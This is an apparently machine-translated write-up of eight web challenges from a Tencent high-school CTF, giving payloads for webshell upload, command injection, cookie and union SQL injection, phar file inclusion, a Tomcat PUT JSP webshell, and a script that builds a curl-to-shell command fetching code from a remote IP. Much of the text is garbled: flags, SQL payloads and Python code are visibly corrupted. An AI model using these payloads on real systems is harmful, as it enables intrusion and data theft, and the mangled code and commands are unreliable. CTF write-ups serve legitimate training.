テンセントサイネット安全T-Star高校チャレンジwriteup

3596 ワード

高校組は今日食べましたか?戦隊WRITEUP
三、問題解決過程のテーマを操作内容に署名すると、Js検査を無効にし、jsを禁止したらアップロードできます.http://588f25a5.yunyansec.com/upload/2.php
蟻剣は繋げばいいです
この問題は自分で作成したスクリプトを使って詳しく書いてください.スクリーンショットは許されません.
flags値:key{K 735 c 9 f 0 D 7 ddc 3 b 9}
タイトル2命令実行基本操作内容:コマンド実行payload:127..0.1|ls...127.1.0.1|cat.../key.phpこの問題は自分で作成したスクリプトを使って詳しく書いてください.スクリーンショットは許されません.
flags値:flags{usderhky}
タイトル3は爆破できますか?操作内容:Admin admin登録後、cookieはunameがあり、base 64を通ります.解読後はadmin結合記述cookieに注入し、payloadをbase 64暗号化してcookieのuname値を修正してページを更新すればいいです.1"union select 1,2,flagm fram flagag葂base 64後LtEHVual W 9 uIHHHHHHHHLbGVjdCAxLDIsZmhZyBmcm 9 tIGYWcj
この問題は自分で作成したスクリプトを使って詳しく書いてください.スクリーンショットは許されません.
flags値:flags{a 405 ef 895 ef 46 d 96}
テーマ4ファイルにはgetshellの操作内容が含まれています.addFroomString('2.php'、$x);?
文の木馬を合成して、pharフォーマットを生成して、修正して後尾をtxtにアップロードして、ファイルの含むところで、http://a3554b54.yunyansec.com/lfi.php?file=phar://./files/n6LYqzd7ZtkfUrSG.txt/2 アリ剣接続
自分で作ったスクリプトを使って詳しく書いてください.スクリーンショットが許されません.
flags値:flags{weisuhanzhongyao}
タイトル5成績調査操作内容:Sql注入爆表:-1’union select 1,2,3,groupCat from information.tablema=database()
バーストフィールド:-1’union select 1,2,3,groupn cat from information.1 lumns where tablema=database()
フライフィールド:-1'union select 1,2,3,flam flam 4 g
この問題は自分で作成したスクリプトを使って詳しく書いてください.スクリーンショットは許されません.
フラグ値:
flags{Sql幅JECT 0 Nu 4813 drd 8 hz 4}
テーマ六小猫は電球を踏んで操作します.CVE-2017-2615利用して、put方法は馬を書きます.
書き込み123.jspにアクセス
この問題は自分で作成したスクリプトを使って詳しく書いてください.スクリーンショットは許されません.
フラグ値:
flags{54 e 47be 053 bf 6 ea 1}
テーマ7分析コードはflagGの操作内容を獲得します.linuxコマンドで改行するなど、文字制限を回避して、curlサーバでコマンドを実行して、keyを1.txtサーバindex.Catに書き込みます.
この問題は自分で作成したスクリプトを使って詳しく書いてください.スクリーンショットが禁止されています.
payload=[菗generate ls -t>g file]、‘ls’、''''''、'-'、'-''、'>>>g'、ls''
'>txt',
'>\>1.\\',
'>h\ \\',
'>bas\\',
'>\|\\',
'>248\\',
'>0.\\',
'>16\\',
'>97.\\',
'>7.\\',
'>4\\',
'>\ \\',
'>rl\\',
'>cu\\',

# exec
'sh _',
'sh g',

for i in payload:
r = requests.get('http://d18945d8.yunyansec.com/?1=' + quote(i))

print i

sleep(0.2)
flags値:flags{a 1 c 8 BFF 2}
タイトル8 SQL注入2操作内容:御剣扫:wroot.zip内にFnction.phpがあります.フィルタ関数のために注入点を探しています.http://2af1b1a3.yunyansec.com/picture.php?id=1 フィルタリングしていません.selectとunionをフィルタリングしたら大変です.action=loginページはusernameとpassword値を転送して、passwordをフィールド名と推測します.%23正則はpasswordに注入し、passwordの値を取得する.
この問題のように自分で作成したスクリプトを使って詳しく書いてください.スクリーンショットimport requests from urllib.parse import rete all="-012345789 ABCDEFGHIJKLMNOPQRSTVWXYZabcdeffhiklmnopsrstuwxyz"=""(=frant========""""""""""+++""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""http://2af1b1a3.yunyansec.com/picture.php?id=1」^(password regexp'^{})%23".format(flags+i)菗菗url="http://518fdfda.yunyansec.com/picture.php?id=1」^(password regexp'^5')%23"r=requests.get(url)print(url)print(url)if"Picture"in.text:flagt+=i print(flagt)break flags値:Flags{e 0 a 34 abral}